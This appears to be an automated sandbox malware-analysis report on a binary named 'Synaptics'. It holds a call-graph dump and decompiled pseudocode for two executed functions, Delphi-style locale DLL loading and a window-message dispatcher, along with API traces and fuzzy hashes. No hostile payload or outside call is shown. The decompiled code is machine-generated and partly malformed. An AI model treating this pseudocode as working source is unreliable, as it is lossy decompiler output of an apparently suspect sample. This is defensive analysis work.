47845 43492e SendMessageA 47843->47845 47846 434967 47844->47846 47845->47834 47847 434938 47845->47847 47849 434977 SendMessageA 47846->47849 47848 404ccc 25 API calls 47847->47848 47848->47841 47849->47834 47851 404cd0 47850->47851 47852 404d31 47850->47852 47853 404a14 47851->47853 47854 404cd8 47851->47854 47855 404a28 47853->47855 47860 404a84 25 API calls 47853->47860 47854->47852 47857 404ce7 47854->47857 47858 404a14 25 API calls 47854->47858 47856 404a56 47855->47856 47861 40277c 20 API calls 47855->47861 47856->47841 47859 404a84 25 API calls 47857->47859 47858->47857 47862 404d01 47859->47862 47860->47855 47861->47856 47863 404a14 25 API calls 47862->47863 47864 404d2d 47863->47864 47864->47841 47865 474e99 47866 474ea7 47865->47866 47886 402cb8 47866->47886 47873 4028c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47875 474ec1 47873->47875 47874 404c88 25 API calls 47874->47875 47875->47873 47875->47874 47877 474efe 47875->47877 47892 403424 25 API calls 47875->47892 47893 403490 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47875->47893 47894 403230 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47875->47894 47895 40308c 47877->47895 47880 4028c4 4 API calls 47881 474f0e 47880->47881 47882 4049c0 20 API calls 47881->47882 47883 474f69 47882->47883 47884 4049e4 20 API calls 47883->47884 47885 474f76 47884->47885 47902 402c60 47886->47902 47889 4028c4 47890 406cdc 4 API calls 47889->47890 47891 4028cc KiUserExceptionDispatcher 47890->47891 47891->47875 47892->47875 47893->47875 47894->47875 47896 4030cb 47895->47896 47897 40309c 47895->47897 47898 4030c9 47896->47898 47910 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47896->47910 47897->47896 47900 4030a2 47897->47900 47898->47880 47900->47898 47909 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47900->47909 47903 402c70 47902->47903 47904 402c76 47902->47904 47903->47904 47907 40308c 4 API calls 47903->47907 47905 402cb3 47904->47905 47908 4028e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47904->47908 47905->47889 47907->47904 47908->47905 47909->47898 47910->47898

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                                                                                                                          0x004061d1
                                                                                                                                                                                          0x004061d3
                                                                                                                                                                                          0x004061db
                                                                                                                                                                                          0x004061ec
                                                                                                                                                                                          0x004061f1
                                                                                                                                                                                          0x0040620a
                                                                                                                                                                                          0x00406211
                                                                                                                                                                                          0x00406253
                                                                                                                                                                                          0x00406255
                                                                                                                                                                                          0x00406256
                                                                                                                                                                                          0x0040625b
                                                                                                                                                                                          0x0040625e
                                                                                                                                                                                          0x00406261
                                                                                                                                                                                          0x00406273
                                                                                                                                                                                          0x00406296
                                                                                                                                                                                          0x004062b6
                                                                                                                                                                                          0x004062b6
                                                                                                                                                                                          0x004062ba
                                                                                                                                                                                          0x004062c0
                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                          0x004062c6
                                                                                                                                                                                          0x004062d4
                                                                                                                                                                                          0x00406213
                                                                                                                                                                                          0x00406228
                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406231
                                                                                                                                                                                          0x00406246
                                                                                                                                                                                          0x0040624d
                                                                                                                                                                                          0x004062dc
                                                                                                                                                                                          0x004062e4
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062ec
                                                                                                                                                                                          0x004062ff
                                                                                                                                                                                          0x00406304
                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406329
                                                                                                                                                                                          0x0040632a
                                                                                                                                                                                          0x00406337
                                                                                                                                                                                          0x0040633c
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x00406359
                                                                                                                                                                                          0x0040635e
                                                                                                                                                                                          0x0040636b
                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                          0x00406370
                                                                                                                                                                                          0x00406371
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x004063a3
                                                                                                                                                                                          0x004063a7
                                                                                                                                                                                          0x004063a8
                                                                                                                                                                                          0x004063a9
                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                          0x004063be
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                          0x004063d9
                                                                                                                                                                                          0x004063dd
                                                                                                                                                                                          0x004063de
                                                                                                                                                                                          0x004063df
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x004063fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040624d
                                                                                                                                                                                          0x0040622f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC), ref: 00406228
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                          • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                          • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00459934 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 25 459934-459968 26 45999c-4599b1 call 4597e8 25->26 27 45996a-45996b 25->27 33 459a65-459a6a 26->33 34 4599b7 26->34 29 45996d-459989 call 41ac6c 27->29 49 459998-45999a 29->49 50 45998b-459993 29->50 35 459a6c 33->35 36 459abb-459ac0 33->36 37 459f03-459f18 call 45aae4 34->37 38 4599bd-4599c0 34->38 43 459a72-459a77 35->43 44 459ddb-459de3 35->44 40 459ae1-459ae6 36->40 41 459ac2 36->41 56 459fe4-459fec 37->56 45 4599c2 38->45 46 459a2c-459a2f 38->46 54 459f56-459f5d 40->54 55 459aec-459af2 40->55 51 459f1d-459f24 41->51 52 459ac8-459acd 41->52 58 459aa2-459aa7 43->58 59 459a79 43->59 44->56 57 459de9-459df4 call 441704 44->57 60 459cc8-459ccf 45->60 61 4599c8-4599cb 45->61 47 459a31 46->47 48 459a4e-459a51 46->48 62 459fa7-459fb8 call 458dec call 4598ac 47->62 63 459a37-459a3a 47->63 64 459a57-459a5a 48->64 65 459b93-459ba1 call 45a038 48->65 49->26 49->29 71 45a003-45a009 50->71 66 459f26-459f39 call 45a5a4 51->66 67 459f3e-459f51 call 45a600 51->67 77 459ec4-459ed2 IsIconic 52->77 78 459ad3-459ad6 52->78 72 459f70-459f7f 54->72 73 459f5f-459f6e 54->73 79 459d98-459db4 call 45ba10 55->79 80 459af8 55->80 56->71 57->56 110 459dfa-459e09 call 441704 IsWindowEnabled 57->110 74 459aad-459ab0 58->74 75 459e9c-459ea7 58->75 69 459e74-459e7f 59->69 70 459a7f-459a84 59->70 60->56 76 459cd5-459cdf 60->76 81 4599d1 61->81 82 459fdd-459fde call 4598ac 61->82 62->56 84 459f81-459fa5 call 445ed0 call 459840 call 4598ac 63->84 85 459a40-459a43 63->85 87 459ce4-459cf0 64->87 88 459a60 64->88 65->56 66->56 67->56 69->56 99 459e85-459e97 69->99 93 459a86-459a8c 70->93 94 459afd-459b0d 70->94 72->56 73->56 96 459ab6 74->96 97 459db9-459dc6 call 45a47c 74->97 75->56 101 459ead-459ebf 75->101 76->56 77->56 83 459ed8-459ee3 GetFocus 77->83 78->37 98 459adc 78->98 79->56 80->82 81->46 108 459fe3 82->108 83->56 102 459ee9-459ef2 call 451750 83->102 84->56 103 459bc7-459be8 call 4598ac 85->103 104 459a49 85->104 87->56 115 459cf6-459d00 87->115 88->82 111 459a92-459a97 93->111 112 459c9c-459cc3 SendMessageA 93->112 116 459b0f-459b14 94->116 117 459b18-459b20 call 45a054 94->117 96->82 97->56 135 459dcc-459dd6 97->135 98->82 99->56 101->56 102->56 147 459ef8-459efe SetFocus 102->147 149 459c0c-459c29 call 45973c PostMessageA 103->149 150 459bea-459c07 call 45974c PostMessageA 103->150 104->82 108->56 110->56 151 459e0f-459e1e call 441704 IsWindowVisible 110->151 123 459a9d 111->123 124 459fba-459fc6 call 4328f8 call 4329d8 111->124 112->56 115->56 126 459d06-459d10 115->126 128 459b25-459b2d call 45a104 116->128 129 459b16-459b39 call 4598ac 116->129 117->56 123->82 124->56 168 459fc8-459fd2 call 4328f8 call 432a34 124->168 139 459d12-459d2e call 40edc4 126->139 140 459d8b-459d93 126->140 128->56 129->56 135->56 166 459d70-459d86 GetLastError 139->166 167 459d30-459d52 GetProcAddress 139->167 140->56 147->56 149->56 150->56 151->56 169 459e24-459e6f GetFocus call 441704 SetFocus call 43c130 SetFocus 151->169 166->56 167->56 170 459d58-459d6b 167->170 168->56 169->56 170->56
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x459fee);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E004597E8(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E004598AC(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00451750(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00441704(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00441704(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00441704(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x49be6c = 0;
											_t206 = GetFocus();
											SetFocus(E00441704(_t372));
											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x49be6c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0045A47C(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0045A054(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0045A104(_v8);
								} else {
									E004598AC(_t377);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E004329D8(E004328F8());
							__eflags = _t247;
							if(_t247 != 0) {
								E00432A34(E004328F8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0045A038(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x49ebbc; // 0x22b1320
							E00458DEC(_t272);
							E004598AC(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x49ddb0; // 0x49eb18
							E00445ED0( *_t276, _t317,  *(_v12 + 4));
							E00459840(_v8, _t308, _t317, _v12, _t370);
							E004598AC(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004598AC(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0045973C();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0045974C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
						case 0:
							0 = E004214B8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407848();
							__eax = E004598AC(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004598AC(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00459744();
							} else {
								_v8 = E0045974C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004598AC(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077A8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004598AC(__ebp);
							} else {
								__eax = E004598E8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00456FEC(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004598AC(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                                                                                                                                                                          0x00459934
                                                                                                                                                                                          0x0045993b
                                                                                                                                                                                          0x0045993d
                                                                                                                                                                                          0x00459940
                                                                                                                                                                                          0x00459945
                                                                                                                                                                                          0x00459946
                                                                                                                                                                                          0x0045994b
                                                                                                                                                                                          0x0045994e
                                                                                                                                                                                          0x00459956
                                                                                                                                                                                          0x00459965
                                                                                                                                                                                          0x00459968
                                                                                                                                                                                          0x0045999c
                                                                                                                                                                                          0x004599a2
                                                                                                                                                                                          0x004599aa
                                                                                                                                                                                          0x004599ac
                                                                                                                                                                                          0x004599ae
                                                                                                                                                                                          0x004599b1
                                                                                                                                                                                          0x00459a65
                                                                                                                                                                                          0x00459a6a
                                                                                                                                                                                          0x00459abb
                                                                                                                                                                                          0x00459ac0
                                                                                                                                                                                          0x00459ae1
                                                                                                                                                                                          0x00459ae1
                                                                                                                                                                                          0x00459ae6
                                                                                                                                                                                          0x00459f56
                                                                                                                                                                                          0x00459f59
                                                                                                                                                                                          0x00459f5d
                                                                                                                                                                                          0x00459f79
                                                                                                                                                                                          0x00459f5f
                                                                                                                                                                                          0x00459f6b
                                                                                                                                                                                          0x00459f6b
                                                                                                                                                                                          0x00459fe4
